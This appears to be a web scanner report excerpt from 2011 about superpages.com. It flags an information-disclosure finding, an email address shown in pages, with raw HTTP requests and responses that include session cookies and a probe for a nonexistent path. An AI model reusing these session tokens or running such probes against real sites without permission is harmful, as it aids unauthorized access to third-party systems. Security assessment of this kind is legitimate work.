HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 17:05:49 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:20:49 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>SuperPages.com: Not Found - Please Try Again</title> <meta http-equiv="Cont ...[SNIP]... <td width="260" height="32">We are unable to provide information regarding your account to xxx@proxymail.facebook.com</td> ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <script language="JavaScript" type="text/javascript"> document.cookie="OpenPhones="; </script> <h ...[SNIP]... <td width="260" height="32">We are unable to provide information regarding your account to xxx@proxymail.facebook.com</td> ...[SNIP]...
The following email address was disclosed in the response:
xxx@proxymail.facebook.com
Request
GET /cities/ HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:06:31 GMT Server: Unspecified Vary: Host Accept-Ranges: bytes Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:31 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Superpages.com: City ...[SNIP]... <td width="260" height="32">We are unable to provide information regarding your account to xxx@proxymail.facebook.com</td> ...[SNIP]...
The following email address was disclosed in the response:
xxx@proxymail.facebook.com
Request
GET /coupons HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: JSESSIONID=935846B8705224F72C259EA0DCC18B40; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 74624 Date: Thu, 03 Feb 2011 17:06:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="h ...[SNIP]... <td width="260" height="32">We are unable to provide information regarding your account to xxx@proxymail.facebook.com</td> ...[SNIP]...
The following email address was disclosed in the response:
xxx@proxymail.facebook.com
Request
GET /vorpal/jabberwocky.cgi HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 17:06:36 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:36 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>SuperPages.com: Not Found - Please Try Again</title> <meta http-equiv="Cont ...[SNIP]... <td width="260" height="32">We are unable to provide information regarding your account to xxx@proxymail.facebook.com</td> ...[SNIP]...
The following email address was disclosed in the response:
xxx@proxymail.facebook.com
Request
GET /yellowpages/C-Banks HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:05:59 GMT Server: Unspecified Vary: Host Last-Modified: Thu, 03 Feb 2011 17:05:59GMT Content-Length: 43816 Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:20:59 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <META NAME="TITLE" CONTENT="Banks in Yellow Pages by SuperPages"> <meta name="desc ...[SNIP]... <td width="260" height="32">We are unable to provide information regarding your account to xxx@proxymail.facebook.com</td> ...[SNIP]...